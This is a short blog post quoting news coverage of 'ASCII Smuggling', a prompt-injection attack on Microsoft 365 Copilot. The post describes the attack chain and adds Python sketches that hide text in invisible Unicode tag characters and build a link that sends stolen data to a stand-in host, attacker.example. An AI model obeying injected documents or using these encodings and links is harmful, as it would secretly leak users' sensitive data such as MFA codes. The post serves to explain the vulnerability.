SCMagazine.com reported that “A patched vulnerability in Microsoft 365 Copilot could expose sensitive data by running a novel AI-enabled technique known as ‘ASCII Smuggling’ that uses special Unicode characters that mirror ASCII text, but are actually not visible to the user interface.” The August 28, 2024 article entitled “‘ASCII Smuggling’ attack exposes sensitive Microsoft Copilot data” (https://www.scmagazine.com/news/ascii-smuggling-attack-exposes-sensitive-microsoft-copilot-data) included these comments from researcher Johann Rehberger (who spent many years at Microsoft):
… that ASCII Smuggling would let an attacker make the large language model (LLM) render the data invisible to the user interface and embed it with clickable hyperlinks with malicious code — setting the stage for data exfiltration.
The article also included these comments from Jason Soroko (senior fellow at Sectigo):
…, said that the ASCII Smuggling flaw in Microsoft 365 Copilot lets attackers hide the malicious code within seemingly harmless text using special Unicode characters. These characters resemble ASCII, said Soroko, but are invisible in the user interface, allowing the attacker to embed hidden data within clickable hyperlinks.
When a user interacts with these links, the hidden data can be exfiltrated to a third-party server, potentially compromising sensitive information, such as MFA one-time-password codes.
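For readers wondering how characters can “resemble ASCII” yet be invisible: the Unicode Tags block contains a counterpart for every printable ASCII character (at code point U+E0000 plus the ASCII value), and many user interfaces render those tag characters as nothing at all. Below is a minimal Python sketch of that encoding trick; the helper names (hide, reveal) and the payload are hypothetical, and this illustrates the general idea rather than Rehberger’s actual proof of concept.

    # Minimal sketch of the "ASCII Smuggling" encoding trick (hypothetical helpers).
    # Each printable ASCII character has a counterpart in the Unicode Tags block
    # at code point 0xE0000 + its ASCII value; many UIs render these as nothing.

    TAG_OFFSET = 0xE0000

    def hide(payload: str) -> str:
        """Encode printable ASCII as invisible Unicode tag characters."""
        return "".join(chr(TAG_OFFSET + ord(c)) for c in payload if 0x20 <= ord(c) <= 0x7E)

    def reveal(text: str) -> str:
        """Recover any tag-encoded characters smuggled inside visible text."""
        return "".join(chr(ord(c) - TAG_OFFSET) for c in text if 0xE0020 <= ord(c) <= 0xE007E)

    visible = "Click here for the meeting notes"
    smuggled = visible + hide("otp=123456")   # illustrative payload only

    print(visible == smuggled)   # False: the strings differ...
    print(reveal(smuggled))      # ...but only reveal() exposes what was hidden: otp=123456

On screen the two strings typically look identical, which is what makes a hidden payload so hard for a user to notice.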
Soroko said the attack works by stringing together multiple methods: First, a prompt injection gets triggered by sharing a malicious document in a chat. Then, Copilot is manipulated to search for more sensitive data, and finally, ASCII Smuggling is used to trick the user into clicking on an exfiltration link.
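To make that last step concrete, here is a hedged sketch of how smuggled data could ride along in an ordinary-looking hyperlink; the domain and helper name (attacker.example, build_exfil_link) are made up, and this shows the general idea rather than the actual exploit used against Copilot.

    # Hypothetical illustration of the exfiltration link described above.
    from urllib.parse import quote

    ATTACKER_ENDPOINT = "https://attacker.example/collect"  # attacker-controlled server (made up)

    def build_exfil_link(stolen: str, label: str = "Open the full report") -> str:
        """Return a markdown-style hyperlink whose URL carries the gathered data."""
        return f"[{label}]({ATTACKER_ENDPOINT}?d={quote(stolen)})"

    # If the user clicks the rendered link, the query string (and whatever was
    # smuggled into it) is sent to the third-party server.
    print(build_exfil_link("mfa_otp=123456"))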
Interesting and scary for AI!
First published at https://www.vogelitlaw.com/blog/ascii-smuggling-attack-exposes-microsoft-ai-copilot-data